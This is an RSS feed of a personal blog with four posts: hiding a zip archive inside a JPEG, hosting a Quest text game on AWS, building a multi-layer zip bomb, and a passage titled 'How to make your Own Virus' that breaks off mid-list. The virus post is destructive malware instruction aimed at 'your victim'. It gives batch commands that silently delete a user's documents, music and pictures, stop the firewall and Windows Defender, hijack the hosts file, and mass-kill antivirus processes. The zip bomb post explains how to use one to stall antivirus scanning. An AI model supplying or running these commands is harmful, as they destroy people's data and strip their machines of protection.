<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[Leewardslope]]></title><description><![CDATA[Thoughts, stories and ideas.]]></description><link>https://leewardslope.digitalpress.blog/</link><image><url>https://leewardslope.digitalpress.blog/favicon.png</url><title>Leewardslope</title><link>https://leewardslope.digitalpress.blog/</link></image><generator>Ghost 4.48</generator><lastBuildDate>Sat, 23 May 2026 07:54:03 GMT</lastBuildDate><atom:link href="https://leewardslope.digitalpress.blog/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[Hide Data Behind Images.]]></title><description><![CDATA[In today's post on cybersecurity, we will look into the art of hiding data behind digital images, which is also termed Steganography. It's pointless but fun.]]></description><link>https://leewardslope.digitalpress.blog/hide-data-behind-images/</link><guid isPermaLink="false">605079cddfc9220001709135</guid><category><![CDATA[Cyber Security]]></category><dc:creator><![CDATA[Evil Morty]]></dc:creator><pubDate>Wed, 17 Mar 2021 01:30:00 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1513519245088-0e12902e5a38?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDEwfHxwaWN0dXJlc3xlbnwwfHx8fDE2MTU4ODcxNjA&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1513519245088-0e12902e5a38?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDEwfHxwaWN0dXJlc3xlbnwwfHx8fDE2MTU4ODcxNjA&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" alt="Hide Data Behind Images."><p>Steganography is the art of hiding messages in such a way that no one, apart from the sender and receiver, suspects the existence of the hidden data. In this tutorial, you&#x2019;ll learn a neat trick using which you can hide whatever data you want behind an image of your choice.</p><h2 id="how-to-hide-data-inside-images">How to hide data inside images?</h2><ol><li>Create a folder. Name it anything you wish, say <code>hide</code>.</li><li>Now put anything and everything you want to hide in this folder. Text files, other images, executables - anything. Also, put the image behind which you want to hide the files in the same directory, say &#x201C;image.jpg&#x201D;.</li><li>Now we need to archive this folder. You can use your choice of compression tool for this (I recommend the free and open source <a href="https://www.7-zip.org/">7-zip</a>). So now we have <code>hide.zip</code> containing all of the data we want to hide behind an image.</li><li>You should have your image, say <code>image.jpg</code> (inside of which we&#x2019;ll hide our data) in the same directory as <code>hide.zip</code> (next to it).</li></ol><p>Now simply open up the command prompt and move to the folder where <code>image.jpg</code> and <code>hide.zip</code> are located using the <code>cd</code> command:</p><pre><code class="language-shell">cd PATH</code></pre><p>For example:</p><pre><code class="language-shell">cd C:\Folder
cd desktop</code></pre><p>Now we type in the following command:</p><pre><code class="language-powershell">copy /b image.jpg + hide.zip output.jpg</code></pre><p>After running this command, you should see an <code>output.jpg</code> in the folder and if you look closely, you&#x2019;ll notice that it&#x2019;s size has increased by approximately the size of the archive. Our data is now <strong>hidden behind the image</strong>.</p><p>The newly created <code>output.jpg</code> behaves like a normal image file, but you can also view the hidden data by opening the file with your compression tool, say 7-zip (Right click -&gt; Open with -&gt; 7-zip).</p><hr><p>And that&#x2019;s It! Now you can send this image to anyone, what others will see is just a regular image but if the recipient knows, they will be able to access the secret information privately. You can also do this for other file types as well such as .mp3, .wmv, .txt, etc.</p><p>Of course, this is just a little trick and not a substitute for proper encryption (it could be if you added a password to your archive file). Still, it isn&#x2019;t exactly subtle if you hide tens or hundreds of megabytes of data behind an innocent image file, which is why you should use proper encryption tools such as <a href="https://veracrypt.codeplex.com/">veracrypt</a> if you have some important or confidential data that you wish to keep hidden.</p>]]></content:encoded></item><item><title><![CDATA[Hosting a quest game on your own server.]]></title><description><![CDATA[In today's guide on Quest, we will discuss one of the two methods I came up with to host a Quest game on our server with a custom domain name. ]]></description><link>https://leewardslope.digitalpress.blog/hosting-quest-game/</link><guid isPermaLink="false">604ecfe9cdd64d0001244042</guid><category><![CDATA[Getting Started]]></category><dc:creator><![CDATA[Akhil Naidu]]></dc:creator><pubDate>Tue, 16 Mar 2021 01:30:00 GMT</pubDate><media:content url="https://digitalpress.fra1.cdn.digitaloceanspaces.com/jojxukr/2021/03/quest.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://digitalpress.fra1.cdn.digitaloceanspaces.com/jojxukr/2021/03/quest.jpg" alt="Hosting a quest game on your own server."><p>To host a quest game on your server, you need to configure an ASP.net server. Don&apos;t worry if you don&apos;t know what it is; think of it as a way windows complicating things compared to Linux. If you are familiar with it, it&apos;s well and good and ignore my criticism. So let&apos;s begin!</p><p>In my quest to host a quest game online, I found two critical ways to host the Game online.</p><ol><li>Directly using ASP.net hosting providers like <a href="https://www.smarterasp.net">smart ASP</a></li><li>Hosting the Game using Windows server 2019 in <a href="https://console.aws.amazon.com/console/home">AWS Console</a></li></ol><p>In this tutorial, I will not elaborate on both methods, but I will provide you with some pros and cons to understand why I choose AWS over SmartASP.</p><h3 id="smart-asp">Smart ASP</h3><p><a href="https://www.smarterasp.net/">Smart ASP</a> is a professional ASP hosting platform that provides you with a reasonably good plan compared to its competitors. They offer you are free trial of 60 days, without any credit card information.</p><h3 id="aws">AWS</h3><p><a href="https://console.aws.amazon.com/console/home">Amazon Web</a> service always amazes developers with its reliable hosting plans and is undoubtedly a costly one to maintain for long-term and data-intense works. But...</p><p>It also provides a 1-year free trial if you are a new customer, and it is pretty good with a lot of tools in our hand. This server is also called the <a href="https://aws.amazon.com/free/?all-free-tier.sort-by=item.additionalFields.SortRank&amp;all-free-tier.sort-order=asc&amp;awsf.Free%20Tier%20Categories=categories%23compute&amp;trk=ps_a134p000006gEZ8AAM&amp;trkCampaign=acq_paid_search_brand&amp;sc_channel=PS&amp;sc_campaign=acquisition_IN&amp;sc_publisher=Google&amp;sc_category=Cloud%20Computing&amp;sc_country=IN&amp;sc_geo=APAC&amp;sc_outcome=acq&amp;sc_detail=amazon%20ec2&amp;sc_content=EC2_e&amp;sc_matchtype=e&amp;sc_segment=489978426363&amp;sc_medium=ACQ-P|PS-GO|Brand|Desktop|SU|Cloud%20Computing|EC2|IN|EN|Text&amp;s_kwcid=AL!4422!3!489978426363!e!!g!!amazon%20ec2&amp;ef_id=Cj0KCQiA-aGCBhCwARIsAHDl5x_2Ab4xCFRFMnKMpihlqANC3kFzoAR3BC2UyQfVrtk1r2Y-57IGI_oaAsGAEALw_wcB:G:s&amp;s_kwcid=AL!4422!3!489978426363!e!!g!!amazon%20ec2">Amazon EC2</a>.</p><h3 id="conclusion">Conclusion</h3><p>Comparing both of these, I realised the plan in terms of time and efficiency; I realised Amazon EC2 would be a great choice. If you want to know a bit more about this, you can always reach me through the comments.</p><h2 id="making-our-game-ready-for-hosting">Making our Game ready for Hosting</h2><p>I hope you already have a game with you waiting to host online. At least if that is the case, I&apos;m here with you.</p><h3 id="organise-all-of-your-game-files">Organise all of your game files</h3><p>In most cases, you already did some organisation. If not, create a folder named after <strong>Game,</strong> and save all of your game files. Especially don&apos;t forget to add your <strong>Game.aslx</strong> file in it; From now I will term this folder as Game Folder</p><h3 id="download-these-resources-which-will-come-in-handy">Download these resources, which will come in handy</h3><p>Quest&apos;s <a href="https://github.com/textadventures/quest">GitHub files</a>; From now, I will term this folder as <strong>Quest Folder.</strong> Also, keep this <a href="https://docs.textadventures.co.uk/quest/source_code.html">link</a> in a new tab; it will be saving you a lot of time. </p><blockquote>Please, don&apos;t follow this guide, especially don&apos;t download Visual Studio and waste your time and energy. I will tell you when to use it as we proceed in this post.</blockquote><h3 id="copy-and-paste-the-game-folder-files-into-quest-folder">Copy and paste the Game Folder files into Quest Folder</h3><p>This Quest folder now contains GitHub files and Game files. To make our things easy, let&apos;s Zip this folder as <strong>Quest_Game.zip</strong>.</p><blockquote>Now, you have a Quest_Game.zip that contains both GitHub files and your Game files on your PC.</blockquote><h2 id="creating-a-free-domain-name">Creating a free Domain Name</h2><p>This part is one of the easiest ones.</p><p>Open the website <a href="https://www.freenom.com/">Freenom</a> to Signup and create an account for yourself. Under the &quot;Services&quot; section, you can see an option, &quot;Register a New domain.&quot; Now, do the honers of finding your name of choice. If your choice of name is available, continue the rest of the procedure to get a free domain.</p><p>I hope now you have a domain name for you. We will use this domain name while configuring our Windows Server. </p><blockquote>This way, you can use your domain name to access and share your Game.</blockquote><h2 id="configuring-a-windows-server-2019-in-amazon-aws-">Configuring a Windows server 2019 in Amazon (AWS)</h2><p>To make this article short and clean, I&apos;m making this as quick as possible. You can always comment below for more information, and also, there are a ton of video online for configuring this server.</p><h3 id="step-by-step-procedure">Step by Step procedure</h3><p>Create an AWS account; it&apos;s not that difficult, but the process is quite cumbersome because you need to provide Debit/Credit card details. Remember, on the day this article published; you will not get charged for anything; The credit/Debit card details are to keep spammers away from creating multiple free accounts.</p><p>Once you have an active AWS account, to host our Game online, we need a Windows Server 2019, and I know many of you are not familiar with the procedure. So among many other YouTube videos, I would recommend you follow this <a href="https://www.youtube.com/watch?v=xnbQV0CMAek">video</a> step by step.</p><p>I believe this particular video covers most of our job in hosting our Game. Briefly speaking, in this video, the commentator shows you how to host an ASP.net website with HTTPS. After following this video for over 9 minutes, he will upload his website files; this is where the zip file you created will come in handy.</p><p>Many of you might face difficulties in this section, so I will try my best to support you through the comments section.</p><blockquote>Tip: If you are a <a href="https://leewardslope.digitalpress.blog/#/portal">member</a> or <a href="https://leewardslope.digitalpress.blog/#subscribe">subscriber</a> of my blog, I will get a personalised notification when you have any quires.</blockquote><p>This is the order of the <a href="https://www.youtube.com/watch?v=xnbQV0CMAek">video</a>.</p><ul><li>Create a Windows server 2019.</li><li>Connect to AWS EC2 using Remote Desktop.</li><li>Download the requirements(IIS Server) for ASP.net hosting.</li><li>Creating a demo website without SSL. (HTTP)</li><li>Replacing IP Address with Domain Name.</li><li>Upload our ZIP file (Quest_Game.zip) and extract it.</li><li><strong>Now, at this stage, you should update the webplayersettings.xml using this </strong><a href="https://docs.textadventures.co.uk/quest/source_code.html"><strong>link</strong></a>.</li><li><strong>Also, the folder Webplayer should be your start project.</strong></li><li>Configuring SSL(HTTPS) using an application, certify the web</li></ul><p>This is how it should look in your windows server.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://digitalpress.fra1.cdn.digitaloceanspaces.com/jojxukr/2021/03/Screenshot_15.206.186.202_1-1.png" class="kg-image" alt="Hosting a quest game on your own server." loading="lazy" width="1510" height="955"><figcaption>Windows Server 2019, IIS Manager.</figcaption></figure><h3 id="some-helpful-tips-while-following-the-video-">Some helpful tips while following the video.</h3><ul><li>If you are using a windows machine, copy-pasting between two devices will work seamlessly. So, take advantage of this feature.</li><li>If you feel like your internet speed is slow, rather than downloading the Quest Github files on your PC and upload them to your Windows Server, copy-pasting the download link in windows server will be a good alternative.</li><li>By default, the server will not come with a stable browser and make things difficult for you. So I would recommend you download this lightweight browser (<a href="https://astian.org/en/midori-browser/">Midori Browser)</a> to your Windows Server. (This is not compulsory)</li><li>If you have a stable internet connection and rely on uploading files from your PC to Windows Server, I would suggest you download CertifyTheWeb and upload it, rather than download it in your browser.</li><li>Don&apos;t forget to configure, manually, your WebPlayerSettings, for this take help of this <a href="https://docs.textadventures.co.uk/quest/source_code.html">link</a>. (This is the link we kept in the new tab a while ago)</li><li>Compared to AWS, configuring things in SmartASP is quite smooth; but it has less only 60 days free trial and some of the very high complex functionalities of the Game are not working. Ex: In my Game previously, I created a function to set his Gender attributes. But this attribute is replacing the name of my character. To check it, enter into my Game (<a href="https://leewardslope.digitalpress.blog/hosting-quest-game/akhilnaidu.tk">Smart</a>ASP) (<a href="https://game.leewardslope.com/Play.aspx?id=1">Aws</a>)</li></ul><blockquote>If you have any doubts or want me to write another article for publishing the Game using SmartASP, comment below. </blockquote><p>Also, I&apos;m looking for some who can help me create a complete course on <strong>Quest, A Guide to developing a Text-Based Adventure</strong>; if anyone is interested, let me know, I will provide them with Author access to this blog, and you can become a permanent author and will allow your personal monetisation.</p>]]></content:encoded></item><item><title><![CDATA[Zip Bomb Test]]></title><description><![CDATA[In today's article on Cyber Security, we will help you realise something quite fascinating about, 
"How zip files work." This might blow off your mind.]]></description><link>https://leewardslope.digitalpress.blog/zip-bomb/</link><guid isPermaLink="false">604c1f97b1829000011b62fa</guid><category><![CDATA[Cyber Security]]></category><dc:creator><![CDATA[Evil Morty]]></dc:creator><pubDate>Mon, 15 Mar 2021 01:30:00 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1612889845286-723dc4572b62?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDIxfHx6aXB8ZW58MHx8fHwxNjE1NjAyMDMz&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1612889845286-723dc4572b62?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDIxfHx6aXB8ZW58MHx8fHwxNjE1NjAyMDMz&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" alt="Zip Bomb Test"><p>A zip bomb, also known as a decompression bomb (or the &#x2018;Zip of Death&#x2019; for the overly dramatic ones), is a malicious archive file designed to crash or render useless the program trying to access it. It could also be employed to disable anti-virus software in order to create an opening for other typical viruses. Rather than hijacking the normal operation of the program, a zip bomb allows the program to work as intended, but the archive is carefully crafted so that unpacking it (for example, by anti-virus in order to scan for viruses) requires inordinate amounts of time, disk space or memory (or all of these).</p><p>The classic zip bomb is a tiny zip archive file, most are measured in kilobytes. However, when this file is unzipped its contents are more than what the system can handle. A typical zip bomb file can easily unpack into hundreds of gigabytes of garbage data and more advanced ones can go up to petabytes (millions of gigabytes) or even exabytes (billions of gigabytes). Yes, to be perfectly clear we are indeed talking about stuffing exabytes of data into kilobytes.</p><p>To understand how it works, we have to take a little detour to see how data compression works (WinZip, WinRAR, 7-zip, etc.)</p><h2 id="what-is-compression">What is compression?</h2><p><em>Compression</em> is a reduction in the number of bits needed to represent data. Consider the following string:</p><blockquote><strong>aaa</strong>bbbb<strong>aaa</strong>b<strong>aaa</strong>b<strong>aaa</strong></blockquote><p>The above string is 18 characters long. Notice that the substring <strong>aaa</strong> can be found a lot of times. This is what&#x2019;s known as statistical redundancy. We take the longest common sequences in data and try to represent them using as few bits as possible. Now, compressing this string means we have to represent this information in less than 18 characters. Let&#x2019;s replace every occurrence of &#x2018;aaa&#x2019; with a symbol, say &#x2018;$&#x2019;, and see what happens. Instead of using the string directly, we use an intermediate (compressed) form of the string along with some instructions on how to get the original string:</p><blockquote><strong>$</strong>bbbb<strong>$</strong>b<strong>$</strong>b<strong>$</strong><br><br>$=aaa</blockquote><p>The first line is supposed to be our compressed data and the second line is the instruction, a <strong>dictionary</strong> that we&#x2019;ve created which tells us that when we want to decompress the data we should replace every occurrence of <strong>$</strong> with <strong>aaa</strong> to get back the original data. Now if you count the total number of characters, we only need 10 + 5 = 15 to represent the same information. <strong>Compression just happened.</strong></p><p>Now, this was a very crude example and our little &#x2018;algorithm&#x2019; ignored a lot of things that a practical compression algorithm (such as <a href="https://en.wikipedia.org/wiki/Huffman_coding">Huffman coding</a> or <a href="https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Welch">LZW</a>) needs. But it&#x2019;ll do for our purposes.</p><p>If you often use compression applications like WinZip or WinRar you&#x2019;ll notice that sometimes your data compresses very well, while other times compression hardly reduces the size of the data. The real takeaway is that compression thrives when the data has some repeating patterns (i.e., statistical redundancy). As an example, when compressing text we can use the knowledge that the <strong>letter e is the most common letter</strong> in modern English. So, it&#x2019;d be worth our while to try and represent <strong>e</strong> by as few bits as possible.</p><p>Now back to zip bombs.</p><h2 id="42-zip">42.zip</h2><p>No discussion on zip bombs is complete without the infamous <a href="https://xeushack.com/download/42.zip">42.zip</a>. It is a zip file consisting of 42 kilobytes of compressed data, containing five layers of nested zip files in sets of 16, each bottom layer archive containing a 4.3 gigabyte (4.3x109 bytes) file for a total of 4.5 petabytes (4.5x1015 bytes) of uncompressed data.</p><p>The 42.zip is just one example, there are many more like this and you can create your own. The principal of zip bombs extends to many other areas. A similar file is an XML-based decompression bomb called <a href="https://en.wikipedia.org/wiki/Billion_laughs">&#x201C;a billion laughs</a>&#x201D; (or XML Bomb). Basically, it crashes a web browser by causing the XML parser to run out of memory. Most web browsers today defend against this by capping the memory allocated to the parser.</p><p>4.5 petabytes are pretty impressive, but what we&#x2019;re about to do is going to blow this out of the water. We are going to build an exabyte zip bomb.</p><h2 id="how-to-make-a-zip-bomb">How to make a zip bomb</h2><p>Let&#x2019;s take a look at how to create your very own zip bomb. It&#x2019;s pretty easy.</p><ul><li>Open up a text editor</li><li>Start typing zeros (0). <strong>A lot of zeros</strong>. Really, just keep the button pressed. And then some more.</li><li>Now select the whole thing and copy and paste. And paste. And paste.</li><li>Rinse and repeat. You need to do the above until your text file has literally <strong>millions of zeroes</strong>. Your innocent text editor will likely begin to lag around a hundred thousand zeros, so be careful and keep going.</li></ul><figure class="kg-card kg-image-card"><img src="https://d33wubrfki0l68.cloudfront.net/c0c9b345a35471a1e7f02a1b80e17d8552813c1e/0005b/static/6afc70c849f5231c817ae0b1d2d2b21f/6ff5e/zeros.png" class="kg-image" alt="Zip Bomb Test" loading="lazy" title="Who told you to stop? Keep pasting!"></figure><p>P.S: There&#x2019;s an easier shortcut. Say you make an initial text file around 10MB worth of zeros. Save it and close your text editor. Go to the folder where your text file is stored, make around ten copies of the text file in the same folder. Now open up a command prompt where your text file is stored and type:</p><pre><code class="language-powershell">copy /b *.txt combined.txt</code></pre><p>What this does is combine all the copies of the text files into one. Better still, it can do this quickly without any lag. Text editors freeze up because of having to deal with the user interface. Using the command line, everything happens as a background process without a hiccup. Combining ten files of 10MB will yield one 100MB file, combine ten copies of that and you have a 1GB text file full of zeros in just a few seconds.</p><p>In a standard text file, <a href="https://en.wikipedia.org/wiki/ASCII">every character needs 1 byte</a> (8 bits) of storage. So,</p><ul><li>One thousand characters = 1,000 bytes (just under one kilobyte. Remember a kilobyte is 1024 bytes, not 1000)</li><li>One million characters = 1,000,000 bytes (just under one megabyte)</li><li>One billion characters = 1,000,000,000 bytes (just shy of one gigabyte)</li></ul><p>The exact size doesn&#x2019;t really matter. A 1GB text file will do just fine.</p><ul><li>Now, open up your compression app (any will work, WinZip, WinRar, 7-zip, etc.) and compress the text file.</li><li>Hold on to your dropping jaw as you&#x2019;ll likely see a compression rate of around 99.9% (1000 times reduction in file size), the 1 GB file would be around 1 MB compressed.</li><li>Now some final bit of copy-pasting is left. Make a dozen or so copies of the zip file. Now zip <em>them</em>.</li><li>Make a few copies of this new zip file and zip all the copies.</li><li>Keep adding more and more layers and viola! <strong>our zip bomb is ready</strong>. At 9 layers (each with 10 zipped files of the layer below), with a 1GB text file at the bottom, you&#x2019;d have a total of <strong>1 exabyte</strong> ( = 109*1GB = 1018 bytes) and the zip bomb would be a few kilobytes.</li></ul><p>And there we go.</p><h2 id="how-is-a-zip-bomb-used">How is a zip bomb used?</h2><p>So now that we have packed a ridiculous amount of data into one tiny file, what can be done with it? Is it just a quirky trick, interesting but useless? Yes and no.</p><p>Old compression applications used to come with a &#x201C;feature&#x201D; called recursive decompression. You could choose to fully unpack an archive that you knew had more archives within it. The zip bomb was actually a bomb for these applications. Even today, most common storage devices (like the hard disk in your computer) are pretty slow. So, it would take a good long while to write a large amount of data to the storage device. Anyone slowly unpacking a zip bomb would quickly notice this and simply stop the process, defusing our bomb. Most modern applications don&#x2019;t use recursive decompression because of zip bombs.</p><p>In the same vein, most modern anti-virus programs can detect whether a file is a zip bomb and avoid unpacking it. In many anti-virus scanners, only a few layers of recursion are performed on archives to help prevent attacks that would cause a buffer overflow, an out of memory condition, or exceed an acceptable amount of program execution time. Zip bombs often (if not always) rely on the repetition of identical files to achieve their extreme compression ratios. Dynamic programming methods can be employed to limit the traversal of such files so that only one file is followed recursively at each level - effectively converting their exponential growth to linear. And so the bomb is defused yet again.</p><p>If this weren&#x2019;t the case, then zip bombs would still be a viable attack against anti-viruses, or at the very least a stalling technique. It&#x2019;s pretty straightforward. A malicious hacker&#x2019;s holy grail is to be able to run an executable file on the victim&#x2019;s computer without the prying eyes of anti-viruses. Anti-viruses keep a close watch on new potentially dangerous files. So to execute a potentially dangerous file, why not distract the anti-virus with something else? This is exactly what a zip bomb could do in earlier times. While the anti-virus is choking up, a malicious executable could easily steal data or install backdoors or just about anything and even whitelist these installations in the anti-virus completely owning the system.</p><p>But this technique is no longer viable. This is both good for us (as users) and bad for us (as hackers). But security is a race without a finish line. You can&#x2019;t ever be sure that a system is completely secure. Even if you do find the very last security hole in a system, you&#x2019;ll never be able to know that it was indeed the last security hole. All we can do is keep on looking and that leaves open the possibility that perhaps one day a new vulnerability would be found and zip bombs would come back with a bang.</p><hr><p>And that ends the story of the zip bomb. These actually come under the class of <strong>logic bombs</strong>, which also contains the <a href="https://leewardslope.digitalpress.blog/fork-bomb">fork bomb</a> we made using batch files. Zip bombs show us that the field of hacking is ripe with creativity and resourcefulness. Even limited memory can be thought of as a &#x201C;flaw&#x201D;, a security hole present in all computers.</p><p>When the old methods stop working, new ones soon pop up and take their place. In cybersecurity, if you can&#x2019;t seem to win by playing fair, trickery and deceit can often give you the upper hand. And that brings us to the realm of <a href="https://leewardslope.digitalpress.blog/introduction-to-social-engineering">social engineering</a>.</p>]]></content:encoded></item><item><title><![CDATA[How to make your Own Virus]]></title><description><![CDATA[By the end of this tutorial, you will be able to create your own virus. Let's dive into a recipe for disaster. Also, be careful about how to use it; I'm leaving it to your wisdom.]]></description><link>https://leewardslope.digitalpress.blog/how-to-make-your-own-virus/</link><guid isPermaLink="false">604b2c2db1829000011b62e0</guid><category><![CDATA[Cyber Security]]></category><dc:creator><![CDATA[Evil Morty]]></dc:creator><pubDate>Sun, 14 Mar 2021 01:30:00 GMT</pubDate><media:content url="https://images.unsplash.com/flagged/photo-1560854350-13c0b47a3180?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDF8fGNvbXB1dGVyJTIwdmlydXN8ZW58MHx8fHwxNjE1NTM5MzM0&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/flagged/photo-1560854350-13c0b47a3180?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDF8fGNvbXB1dGVyJTIwdmlydXN8ZW58MHx8fHwxNjE1NTM5MzM0&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" alt="How to make your Own Virus"><p>By now you should have a pretty good grip on <a href="https://leewardslope.digitalpress.blog/frequently-asked-questions-about-batch-files">working with batch files</a>. The time has come for you to fly out of the nest. Presented below are a few ideas for things that you can make your viruses do.</p><p>These commands should work on most Windows 10 systems with the default configuration. However, you may need to tweak some of them before they work for you. For example, to kill your victim&#x2019;s anti-virus, you&#x2019;ll need to know what anti-virus they have in the first place, only then can you stop its process and delete it.</p><p><strong>Warning:</strong> Executing some of these commands WILL result in permanent loss of data. If you want to try these out, do so <a href="https://leewardslope.digitalpress.blog/setting-up-a-virtual-machine-to-practice-hacking">in a virtual machine</a>.</p><h2 id="delete-important-stuff">Delete important stuff</h2><p>Damaging personal data is a purely destructive attack motive. The attacker gains nothing but the victim loses something. For better or worse, this is something that batch files really shine at. Batch files can quietly delete vast quantities of data without the victim ever realizing what&#x2019;s happening until it&#x2019;s too late. And using the <code>del</code> command means the data is not going to the recycle bin, it&#x2019;s permanently deleted.</p><p>What&#x2019;s even scarier is that most directories, including the examples below, <strong>don&#x2019;t require admin privileges</strong> to access, by default. However, if you are able to run a batch file as an administrator then that opens up the entire system to attack (such as deleting anti-viruses to allow other malware to roam freely).</p><p><strong>Delete Documents</strong></p><pre><code class="language-powershell">del /f /q &quot;%userprofile%\Documents\*.*&quot;</code></pre><p><strong>Delete Music</strong></p><pre><code class="language-powershell">del /f /q &quot;%userprofile%\Music\*.*&quot;</code></pre><p><strong>Delete Pictures</strong></p><pre><code class="language-powershell">del /f /q &quot;%userprofile%\Pictures\*.*&quot;</code></pre><h2 id="disable-important-stuff">Disable Important stuff</h2><p>The fact that windows provide utilities and services that can be accessed through the command line opens up yet another attack vector. Changing important configurations such as registry entries can render a computer unusable.</p><p><strong>Disable Wi-Fi</strong> - Let&#x2019;s see how we can go about this. First, we find out the names of all the network interfaces:</p><pre><code class="language-powershell">netsh interface show interface</code></pre><p>This outputs:</p><pre><code class="language-powershell">Admin State    State          Type             Interface Name
-------------------------------------------------------------------------
Enabled        Disconnected   Dedicated        Ethernet
Enabled        Connected      Dedicated        VirtualBox Host-Only Network
Enabled        Connected      Dedicated        Ethernet 2
Enabled        Connected      Dedicated        Wi-Fi</code></pre><p>For my computer, the wireless interface is simply named <code>Wi-Fi</code> (it may be different for you). And now we can just disable it:</p><pre><code class="language-powershell">netsh interface set interface &quot;Wi-Fi&quot; Disable</code></pre><p>And the Wi-Fi stops working and also the Wi-Fi icon disappears from the taskbar.</p><p>It can be re-enabled by using this command: (<em>P.S: Disabling/Enabling interfaces requires admin privileges.</em>)</p><pre><code class="language-powershell">netsh interface set interface &quot;Wi-Fi&quot; Enable</code></pre><p>Or through the control panel:</p><figure class="kg-card kg-image-card"><img src="https://d33wubrfki0l68.cloudfront.net/8502507db7082a1e3b2c94351edc0663b80d5794/954ed/static/e9f1e420f6dbab04449f8da655085eda/6ff5e/wifisettings.png" class="kg-image" alt="How to make your Own Virus" loading="lazy" title="WiFiSettings"></figure><p><strong>Disable the firewall</strong></p><pre><code class="language-powershell">net stop &quot;MpsSvc&quot;</code></pre><p><strong>Stop Windows Defender</strong></p><pre><code class="language-powershell">taskkill /f /t /im &quot;MSASCuiL.exe&quot;
taskkill /f /t /im &quot;MSASCui.exe&quot;</code></pre><h2 id="block-websites">Block Websites</h2><p>We can block any website we want by editing the <code>hosts</code> file:</p><pre><code class="language-powershell">cd &quot;C:\Windows\System32\Drivers\etc&quot;
echo 127.0.0.1 google.com &gt;&gt; &quot;hosts&quot;
echo 127.0.0.1 www.google.com &gt;&gt; &quot;hosts&quot;</code></pre><p><code>127.0.0.1</code> is the localhost. The above command tells the computer that it&#x2019;s going to find <code>google.com</code> on your own device. So the browser doesn&#x2019;t even bother trying to find out the real IP address of <code>google.com</code>, it just uses localhost, where of course it doesn&#x2019;t get a reply. You&#x2019;ll usually want to block both the top level domain as well as the <code>www.</code> subdomain.</p><p>This is kind of a shitty thing to do to someone, don&#x2019;t you think? Maybe you should be a white-hat and make a &#x201C;virus&#x201D; that <a href="https://github.com/StevenBlack/hosts">blocks intrusive ads</a> and help protect your victim&#x2019;s privacy.</p><h2 id="delete-all-anti-viruses">Delete all anti-viruses</h2><p>The following snippet tries to disable and delete all common anti-viruses. It&#x2019;s really just a hail mary and definitely not the most appropriate way to go about this. You&#x2019;ll need admin rights to run this. Below you&#x2019;ll see two types of commands:</p><ul><li><code>taskkill</code>: These commands attempt to kill the running anti-virus processes. A bunch of common process names are included below. Note that we&#x2019;re using the wildcard <code>*</code> in the names. This means, for example, <code>av*</code> will include all the names that begin with &#x2018;av&#x2019;. So it is possible that a whole lot of innocent process also get caught in the crossfire.</li><li><code>RMDIR</code>: These commands simply delete the default installation folders of the anti-viruses.</li></ul><pre><code class="language-powershell">taskkill /F /IM av* &gt;NUL
taskkill /F /IM fire* &gt;NUL
taskkill /F /IM anti* &gt;NUL
taskkill /F /IM spy* &gt;NUL
taskkill /F /IM bullguard* &gt;NUL
taskkill /F /IM PersFw* &gt;NUL
taskkill /F /IM KAV* &gt;NUL
taskkill /F /IM ZONEALARM* &gt;NUL
taskkill /F /IM SAFEWEB* &gt;NUL
taskkill /F /IM OUTPOST* &gt;NUL
taskkill /F /IM nv* &gt;NUL
taskkill /F /IM nav* &gt;NUL
taskkill /F /IM F-* &gt;NUL
taskkill /F /IM ESAFE* &gt;NUL
taskkill /F /IM cle* &gt;NUL
taskkill /F /IM BLACKICE* &gt;NUL
taskkill /F /IM def* &gt;NUL
taskkill /F /IM kav* &gt;NUL
taskkill /F /IM kav* &gt;NUL
taskkill /F /IM avg* &gt;NUL
taskkill /F /IM ash* &gt;NUL
taskkill /F /IM aswupdsv* &gt;NUL
taskkill /F /IM ewid* &gt;NUL
taskkill /F /IM guar* &gt;NUL
taskkill /F /IM gcasDt* &gt;NUL
taskkill /F /IM msmp* &gt;NUL
taskkill /F /IM mcafe* &gt;NUL
taskkill /F /IM mghtml* &gt;NUL
taskkill /F /IM msiexec* &gt;NUL
taskkill /F /IM outpost* &gt;NUL
taskkill /F /IM isafe* &gt;NUL
taskkill /F /IM zap* &gt;NUL
taskkill /F /IM zauinst* &gt;NUL
taskkill /F /IM upd* &gt;NUL
taskkill /F /IM zlclien* &gt;NUL
taskkill /F /IM minilog* &gt;NUL
taskkill /F /IM norton* &gt;NUL
taskkill /F /IM ccc* &gt;NUL
taskkill /F /IM npfmn* &gt;NUL
taskkill /F /IM loge* &gt;NUL
taskkill /F /IM nisum* &gt;NUL
taskkill /F /IM issvc* &gt;NUL
taskkill /F /IM tmp* &gt;NUL
taskkill /F /IM tmn* &gt;NUL
taskkill /F /IM pcc* &gt;NUL
taskkill /F /IM cpd* &gt;NUL
